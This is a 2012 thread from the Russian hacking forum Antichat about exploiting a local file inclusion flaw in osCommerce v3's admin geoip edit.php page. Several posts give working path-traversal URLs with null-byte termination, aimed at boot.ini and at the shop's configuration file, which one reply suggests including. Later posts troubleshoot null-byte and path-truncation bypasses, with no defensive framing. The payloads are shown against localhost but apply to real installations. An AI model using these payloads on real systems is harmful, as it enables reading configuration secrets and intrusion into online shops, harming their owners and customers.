Форум АНТИЧАТ - OSCommerce V3 LFI

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - OSCommerce V3 LFI (https://forum.antichat.xyz/showthread.php?t=336874)

Pirotexnik

10.06.2012 05:57

Нашел LFI, но незнаю как реализовать...

http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../../../../../../../../../../../../boot.ini%00

Все бы хорошо, но помимо include() эта переменная используется еще где-то:

Код:

Code:

Fatal error: Call to a member function loadIniFile() on a non-object in C:\web\htdocs\oscommerce\admin\includes\applications\modules_geoip\pages\edit.php on line 18

Код:

Code:

18: $osC_Language->loadIniFile('modules/geoip/' . $_GET['module'] . '.php');

Помогите

pharm_all

15.06.2012 05:00

Цитата:

Сообщение от Pirotexnik

Pirotexnik said:
Нашел LFI, но незнаю как реализовать...
http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../../../../../../../../../../../../boot.ini%00
Все бы хорошо, но помимо
include()
эта переменная используется еще где-то:

Код:

Code:

Fatal error: Call to a member function loadIniFile() on a non-object in C:\web\htdocs\oscommerce\admin\includes\applications\modules_geoip\pages\edit.php on line 18

Код:

Code:

18: $osC_Language->loadIniFile('modules/geoip/' . $_GET['module'] . '.php');

Помогите

http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../../../../../../../../C:/web/htdocs/oscommerce/includes/conf не помню название конфига.php%00

Проинклудь конфиг, поиграйся.

Tigger

15.06.2012 06:20

Pirotexnik

Шляпу экстрасенса, увы, потерял, поэтому требую код ф-ции loadIniFile =\

И строку с инклюдом данной переменной тоже неплохо бы увидеть.

pharm_all

Что-что, простите? Каким образом он проинклюдит (и как это поможет!?) если у него не работает инклюд?

Tigger

15.06.2012 07:19

http://screenshotuploader.com/i/01/qw3D0bB6I.png

Что я делаю не так?

Цитата:

Сообщение от None

Все бы хорошо, но помимо include() эта переменная используется еще где-то:

Посмотрел кодес. Интересно, причем тут это вообще? Инклюд идет в первой строчке скрипта. Причем тут вообще то, что вызывается далее?

Pirotexnik

16.06.2012 17:26

Да, затупил я...

Теперь вопрос по поводу .php

http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../lfi - GOOD

http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../lfi.php%00 - BAD

http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../lfi.gif%00 - BAD

./[4096] - тоже не спасли. Это у меня на локалхосте косяк?)

Как быть?

Expl0ited

16.06.2012 18:00

потому что скорее всего не правильно юзаешь аналог нульбайту

Pirotexnik

16.06.2012 19:59

А как тгда правильно? О_о

Время: 02:26